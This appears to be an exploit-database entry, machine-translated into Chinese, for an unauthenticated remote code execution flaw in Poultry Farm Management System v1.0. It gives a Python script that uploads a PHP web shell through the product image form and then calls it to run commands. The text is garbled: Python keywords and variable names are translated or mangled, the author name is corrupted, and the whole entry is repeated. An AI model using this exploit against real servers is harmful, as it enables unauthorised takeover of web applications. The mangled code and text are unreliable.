#利用标题:家禽农场管理系统v1.0-远程代码执行(RCE)
#日期: 24-06-2024
#CVE: N/A(等待要分配的ID)
#利用作者:杰里马云惹不起马云托马斯(W3bn00b3r)
#供应商homepage3360 https://www.sourcecodester.com/php/15230/poultry-farm-management-system-system-free-download.html
#软件link: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/redcock-farm.zip
#github-https://github.com/w3bn00b3r/unauthenticatiCated-Remote-code-execution-rce---poultry-farm-farm-Management-symagement-system-v1.0/
#类别: Web应用程序
#版本: 1.0
#在: Windows 10上测试| XAMPP v3.3.0
#脆弱的端点: http://localhost/farm/product.php
导入请求
从Colorama进口,风格,初始
#初始化Colorama
init(autoret=true)
def upload_backdoor(target):
upload_url=f'{target} /farm/product.php'
shell_url=f'{target}/farm/assets/img/productimages/web-backdoor.php'
#准备有效载荷
有效载荷={
'类别':'鸡肉',
'product':'rce',
'Price':'100',
'save':''
}
#要上传的PHP代码
命令='主机名'
data=f'?php system('{command}');'
#准备文件数据
文件={
'productImage':('web-backdoor.php',数据,'application/x-php')
}
TRY:
打印(“将发布请求发送到:',upload_url)
wendmes=requests.post(upload_url,files=files,data=有效载荷,
验证=false)
if antsphy.status_code==200:
print('\ nResponse状态代码:',wendesp.status_code)
打印(F'Shell已成功上传: {shell_url}')
#向shell URL提出请求以执行命令
shell_response=requests.get(shell_url,verify=false)
打印('命令输出:',fore.green +
shell_response.text.strip())
其他:
打印(F'FALED上传外壳。状态代码:
{Response.status_code}')
打印('响应content:',wendesp.text)
除了请求。
打印(发生f'an错误: {e}')
如果name=='__ -Main __':
target='http://localhost'#将其更改为目标
upload_backdoor(目标)
#日期: 24-06-2024
#CVE: N/A(等待要分配的ID)
#利用作者:杰里马云惹不起马云托马斯(W3bn00b3r)
#供应商homepage3360 https://www.sourcecodester.com/php/15230/poultry-farm-management-system-system-free-download.html
#软件link: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/redcock-farm.zip
#github-https://github.com/w3bn00b3r/unauthenticatiCated-Remote-code-execution-rce---poultry-farm-farm-Management-symagement-system-v1.0/
#类别: Web应用程序
#版本: 1.0
#在: Windows 10上测试| XAMPP v3.3.0
#脆弱的端点: http://localhost/farm/product.php
导入请求
从Colorama进口,风格,初始
#初始化Colorama
init(autoret=true)
def upload_backdoor(target):
upload_url=f'{target} /farm/product.php'
shell_url=f'{target}/farm/assets/img/productimages/web-backdoor.php'
#准备有效载荷
有效载荷={
'类别':'鸡肉',
'product':'rce',
'Price':'100',
'save':''
}
#要上传的PHP代码
命令='主机名'
data=f'?php system('{command}');'
#准备文件数据
文件={
'productImage':('web-backdoor.php',数据,'application/x-php')
}
TRY:
打印(“将发布请求发送到:',upload_url)
wendmes=requests.post(upload_url,files=files,data=有效载荷,
验证=false)
if antsphy.status_code==200:
print('\ nResponse状态代码:',wendesp.status_code)
打印(F'Shell已成功上传: {shell_url}')
#向shell URL提出请求以执行命令
shell_response=requests.get(shell_url,verify=false)
打印('命令输出:',fore.green +
shell_response.text.strip())
其他:
打印(F'FALED上传外壳。状态代码:
{Response.status_code}')
打印('响应content:',wendesp.text)
除了请求。
打印(发生f'an错误: {e}')
如果name=='__ -Main __':
target='http://localhost'#将其更改为目标
upload_backdoor(目标)
